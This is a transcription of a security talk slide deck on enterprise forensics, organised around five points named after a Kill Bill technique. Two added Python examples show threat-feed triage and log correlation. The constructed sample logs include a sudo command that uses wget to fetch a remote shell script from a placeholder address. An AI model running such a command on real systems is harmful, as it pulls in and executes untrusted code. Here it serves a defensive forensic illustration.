Five Point Palm Exploding Heart Technique for Forensics

Transcription

The Five Point Palm Exploding Heart Technique for Forensics
Andrew Hay, The 451 Group

The 451 Group
451 Research is focused on the business of enterprise IT innovation. The company's analysts provide critical and timely insight into the competitive dynamics of innovation in emerging technology segments. Tier1 Research is a single-source research and advisory firm covering the multi-tenant datacenter, hosting, IT and cloud-computing sectors, blending the best of industry and financial research. The Uptime Institute is 'The Global Data Center Authority' and a pioneer in the creation and facilitation of end-user knowledge communities to improve reliability and uninterruptible availability in datacenter facilities. TheInfoPro is a leading IT advisory and research firm that provides real-world perspectives on the customer and market dynamics of the enterprise information technology landscape, harnessing the collective knowledge and insight of leading IT organizations worldwide. ChangeWave Research is a research firm that identifies and quantifies 'change' in consumer spending behavior, corporate purchasing, and industry, company and technology trends.

Introductions
• Andrew Hay
• Senior Security Analyst, The 451 Group
• Author, Speaker and Blogger
• Coverage Areas:
  • ESIM (SIEM & Log Management)
  • IT-GRC
  • Forensics & Incident Response
  • Intrusion Detection/Prevention
• Macro research areas:
  • [Nation State] Cyber Security & Critical Infrastructure Protection

What is this talk about?
• Forensics has traditionally been viewed as very system-specific
• Only recently have external (off of the target machine) sources of corroborating evidence been considered 'valuable' by investigators
Image Source: http://infosecnewbie.blogspot.com/2010/11/open-source-forensics-fundamental.html

Essentially, we need less of this…
Image Source: http://preview.tinyurl.com/3wtpgre

And more of this…
Image Source: http://preview.tinyurl.com/3ux8bo6
Idea for this talk…
• The idea for this talk came from Tarantino's Kill Bill two-part epic revenge drama
• In it, martial arts master Pai Mei teaches 'The Bride' a technique wherein pressure points on the victim's chest are struck, leaving them with a few footsteps before their death
• This technique is referred to as the 'Five Point Palm Exploding Heart Technique'
Image Source: http://inatitude.files.wordpress.com/2009/02/pai-mei.jpg
So what are the five points?
• Platform Forensics
• Network Forensics
• Data Reduction
• Corroborators
• Orchestration

Point 1 – Platform forensics
• 'Traditional forensics'
• No one will argue that the artifacts residing on the suspect endpoint hold lots of information
• Volatile memory, application artifacts and other 'footprints'
• One should be cognizant, however, of the other sources of information spread throughout an enterprise environment NOT residing on the target system
Image Source: https://cagandoregra.wordpress.com/2010/08/03/the-36th-chamber-of-shaolin-a-camara-36-de-shaolin/

Point 1 – Platform forensics: possible tools
[figure: Platform Forensics]

Point 2 – Network forensics
• If a host needs to talk to the world, it needs to leverage the network
• Likewise, if an attacker interacted with the machine remotely there may be a trail
• Deep packet inspection (DPI), network flow generation/collection/inspection, packet sniffers and flow analytics engines
Image Source: http://www.imdb.com/media/rm2382076160/ch0001814
Point 2 – Network forensics: possible tools
[figure: Network Forensics]

Point 3 – Data reduction
• Feeds and sources of third party data that help analysts focus on the 'bad'
• Why look at what we know we don't need to look at?
• 'Get by' with a little help from your friends
• Application whitelisting, threat intelligence feeds, known compromised IP addresses/ranges, etc.
Image Source: http://1morefilmblog.com/wordpress/dis-enchanted-female-power-and-authority-in-ella-enchanted-and-kill-billvolume-2/
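The data-reduction point above, as an added example (not code from the talk or from any product it mentions): a process snapshot and a set of flows from one suspect host are judged against an application whitelist, a known-bad hash list, an approved-destination list and a known-compromised range list, the known-good items are dropped, and the analyst gets only the residue, known-bad first. All hashes, addresses and feed entries are constructed placeholders (assumption), and the "known bad" checks deliberately run before the "known good" checks so that a whitelisted name with a bad hash, or a compromised host inside an approved range, is still surfaced.

```python
"""Data reduction for triage: drop what a known-good source vouches for,
surface what a known-bad source flags, hand the analyst only the residue.
Added example; every hash, address and feed entry is constructed (assumption)."""
import ipaddress
from dataclasses import dataclass

# "Friends" the talk refers to. Constructed sample content; a deployment would
# load these from the whitelisting product and the subscribed intel feeds.
KNOWN_GOOD_HASHES = {            # application whitelist (truncated placeholder hashes)
    "a1b2c3d4e5f60718": "explorer.exe, vendor whitelist",
    "0f0e0d0c0b0a0908": "svchost.exe, vendor whitelist",
}
KNOWN_BAD_HASHES = {             # threat-intel hash feed (constructed)
    "deadbeef00000001": "dropper listed in intel feed (constructed entry)",
}
APPROVED_NETWORKS = [            # business-approved destinations (constructed)
    ipaddress.ip_network("10.0.0.0/8"),
    ipaddress.ip_network("192.0.2.0/24"),
]
KNOWN_BAD_NETWORKS = [           # "known compromised" ranges from a feed (constructed)
    ipaddress.ip_network("203.0.113.0/24"),
]

@dataclass(frozen=True)
class Process:
    host: str
    pid: int
    image: str
    sha256: str

@dataclass(frozen=True)
class Flow:
    host: str
    dst_ip: str
    dst_port: int
    bytes_out: int

@dataclass(frozen=True)
class Verdict:
    item: object
    disposition: str             # "known_bad" | "known_good" | "unknown"
    reason: str

def _in_any(ip, nets):
    addr = ipaddress.ip_address(ip)
    return any(addr in net for net in nets)

def judge_process(p):
    h = p.sha256.lower()
    if h in KNOWN_BAD_HASHES:    # bad beats good: a trusted file name proves nothing
        return Verdict(p, "known_bad", KNOWN_BAD_HASHES[h])
    if h in KNOWN_GOOD_HASHES:
        return Verdict(p, "known_good", KNOWN_GOOD_HASHES[h])
    return Verdict(p, "unknown", "hash in no list")

def judge_flow(f):
    if _in_any(f.dst_ip, KNOWN_BAD_NETWORKS):   # checked first: compromised hosts live in approved ranges too
        return Verdict(f, "known_bad", "destination in known-compromised range")
    if _in_any(f.dst_ip, APPROVED_NETWORKS):
        return Verdict(f, "known_good", "destination in approved range")
    return Verdict(f, "unknown", "destination not in any list")

def reduce_for_analyst(items, judge):
    """Drop known-good items; return the rest with known-bad items first."""
    residue = [v for v in (judge(i) for i in items) if v.disposition != "known_good"]
    residue.sort(key=lambda v: v.disposition != "known_bad")   # stable: bad first, order kept otherwise
    return residue

# Constructed snapshot from one suspect host (assumption).
SAMPLE_PROCESSES = [
    Process("ws-0042", 1200, r"C:\Windows\explorer.exe", "A1B2C3D4E5F60718"),
    Process("ws-0042", 1304, r"C:\Windows\System32\svchost.exe", "0f0e0d0c0b0a0908"),
    Process("ws-0042", 4410, r"C:\Users\Public\update.exe", "deadbeef00000001"),
    Process("ws-0042", 4522, r"C:\Users\Public\tool.exe", "1234567890abcdef"),
]
SAMPLE_FLOWS = [
    Flow("ws-0042", "10.1.2.3", 445, 4_000),
    Flow("ws-0042", "203.0.113.7", 443, 98_000),
    Flow("ws-0042", "198.51.100.9", 8443, 12_000),
    Flow("ws-0042", "192.0.2.15", 443, 900),
]

def triage(processes=SAMPLE_PROCESSES, flows=SAMPLE_FLOWS):
    """Return what is left for a human after the feeds have done their part."""
    procs = reduce_for_analyst(processes, judge_process)
    flws = reduce_for_analyst(flows, judge_flow)
    return {"processes": procs, "flows": flws,
            "dropped": len(processes) + len(flows) - len(procs) - len(flws)}

if __name__ == "__main__":
    result = triage()
    for v in result["processes"] + result["flows"]:
        print(v.disposition.ljust(10), v.reason, "->", v.item)
    print("dropped by known-good feeds:", result["dropped"])
```

Hash case is normalized before lookup because process-listing tools disagree on case; the unknowns are kept, not dropped, since "not on a list" is exactly what the analyst is paid to look at.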
Point 3 – Data reduction: possible sources
[figure: Data Reduction]

Point 4 – Corroborators
• 'Helpers' or sources of additional information
• Vulnerability & patch management
• Perimeter detection/protection
• Endpoint protection
• Change, configuration and policy management
• System management
• DLP, NAC, etc.
Image Source: http://1morefilmblog.com/wordpress/dis-enchanted-female-power-and-authority-in-ella-enchanted-and-kill-billvolume-2/
Point 4 – Corroborators: possible sources
[figure: Corroborators]

Point 5 – Orchestration
• Tools designed to correlate, normalize and alert on enterprise information (not just security information)
• Central repositories of information are… well… central repositories of information!
• SIEM, log management, IT GRC, compliance management, etc.
Image Source: http://celluloidamazing.blogspot.com/2009/11/when-i-woke-up-i-went-on-what-movie.html
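The orchestration point (normalize, then correlate) together with the corroborators point, as an added example that is not code from the talk or from any SIEM it alludes to: records from three differently formatted feeds are normalized into one event schema, the events for a pivot host inside a time window around a pivot event are merged into a single timeline, and static context from corroborating systems is attached. The raw syslog, IDS, NetFlow and corroborator records, the host names and the addresses are all constructed (assumption) and only loosely resemble real product output.

```python
"""Orchestration: normalize heterogeneous records into one schema, correlate
by host and time around a pivot, attach corroborator context.
Added example; all records, hosts, addresses and context are constructed (assumption)."""
import re
from dataclasses import dataclass
from datetime import datetime, timedelta, timezone

@dataclass(order=True, frozen=True)
class Event:
    ts: datetime          # normalized to UTC
    host: str             # normalized to the asset-inventory name
    source: str           # feed the record came from
    summary: str          # one human-readable line

def parse_ts(s):
    return datetime.strptime(s, "%Y-%m-%dT%H:%M:%SZ").replace(tzinfo=timezone.utc)

# Constructed raw records (assumption); formats are illustrative only.
RAW_SYSLOG = [
    "2011-06-14T02:11:05Z ws-0042 sshd[2211]: Accepted password for svc_backup from 198.51.100.9 port 52111 ssh2",
    "2011-06-14T02:12:40Z ws-0042 sudo: svc_backup : TTY=pts/0 ; COMMAND=/usr/bin/wget http://203.0.113.7/u.sh",
    "2011-06-14T09:00:01Z fs-0001 cron[410]: (root) CMD (run-parts /etc/cron.hourly)",
]
RAW_IDS = [   # ts|host|src|dst|dport|signature
    "2011-06-14T02:12:41Z|ws-0042|10.0.5.42|203.0.113.7|80|POLICY outbound wget user-agent (constructed)",
]
RAW_FLOWS = [  # ts,src,dst,dport,proto,packets,bytes
    "2011-06-14T02:12:41Z,10.0.5.42,203.0.113.7,80,6,1204,98231",
    "2011-06-14T03:15:00Z,10.0.5.42,10.0.0.10,53,17,80,160",
]
HOST_BY_IP = {"10.0.5.42": "ws-0042", "10.0.0.10": "dns-0001"}   # asset inventory (constructed)
CORROBORATORS = {   # static context from vuln/patch management and NAC (constructed)
    "ws-0042": [
        "vuln mgmt: scan of 2011-06-10 found SSH password authentication enabled",
        "patch mgmt: 2 critical updates pending since 2011-05-30",
        "NAC: last authenticated 2011-06-13T18:02:00Z on VLAN 50",
    ],
}

SYSLOG_RE = re.compile(r"^(?P<ts>\S+) (?P<host>\S+) (?P<prog>[^:\[]+)(?:\[\d+\])?: (?P<msg>.*)$")

def from_syslog(lines):
    events = []
    for line in lines:
        m = SYSLOG_RE.match(line)
        if not m:
            continue            # unparseable lines are skipped, never guessed at
        events.append(Event(parse_ts(m["ts"]), m["host"], "syslog", f'{m["prog"]}: {m["msg"]}'))
    return events

def from_ids(lines):
    events = []
    for line in lines:
        ts, host, src, dst, dport, sig = line.split("|")
        events.append(Event(parse_ts(ts), host, "ids", f"{sig} ({src} -> {dst}:{dport})"))
    return events

def from_flows(lines):
    events = []
    for line in lines:
        ts, src, dst, dport, proto, pkts, nbytes = line.split(",")
        host = HOST_BY_IP.get(src, src)   # flows carry IPs; map them onto the inventory name
        events.append(Event(parse_ts(ts), host, "netflow",
                            f"{src} -> {dst}:{dport}/{proto} {pkts} pkts {nbytes} bytes"))
    return events

def build_timeline(events, host, pivot, window):
    """All normalized events for one host within +/- window of the pivot, in time order."""
    lo, hi = pivot - window, pivot + window
    return sorted(e for e in events if e.host == host and lo <= e.ts <= hi)

def investigate(host, pivot, window=timedelta(minutes=30)):
    events = from_syslog(RAW_SYSLOG) + from_ids(RAW_IDS) + from_flows(RAW_FLOWS)
    return {"host": host,
            "timeline": build_timeline(events, host, pivot, window),
            "context": CORROBORATORS.get(host, [])}

if __name__ == "__main__":
    result = investigate("ws-0042", parse_ts("2011-06-14T02:12:41Z"))
    for e in result["timeline"]:
        print(e.ts.isoformat(), e.source.ljust(7), e.summary)
    for c in result["context"]:
        print("context:", c)
```

The pivot here is the IDS alert; the timeline shows the login and the sudo command that precede it on the host and the flow that accompanies it, while the 03:15 DNS flow falls outside the window and the cron entry belongs to another host. Mapping flow addresses to inventory names is what makes the join possible at all, and the corroborator context is what turns "a login" into "a password login on a box the scanner already flagged".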
Point 5 – Orchestration: possible tools
[figure: Orchestration]

What will it look like?
[figure: Platform Forensics, Network Forensics, Data Reduction, Corroborators, Orchestration]

The result?
• Many hands make light work – this is extremely true with regards to forensics
• Evidence on a system can almost always be enriched by external sources of corroborating evidence
• Hindsight is 20/20 – deploy now to help later
Image Source: http://totallyradicalsportz.wordpress.com/2010/10/11/smackfest/
The result?
• Vendors must strive to 'play together' for this integration to work
• Some vendors are starting down this path, but primarily to enrich their own data
• WE need to teach non-forensics vendors the value of forensic data
• WE need to teach forensics vendors the value of integration
Image Source: http://blog.lowpricelessons.com/wp-content/uploads/2011/01/kill-bill-uma-in-car.jpg
The result?
Image Source: http://en.wikipedia.org/wiki/File:Clenched_human_fist.png
Thank You…

Questions?
andrew.hay@the451group.com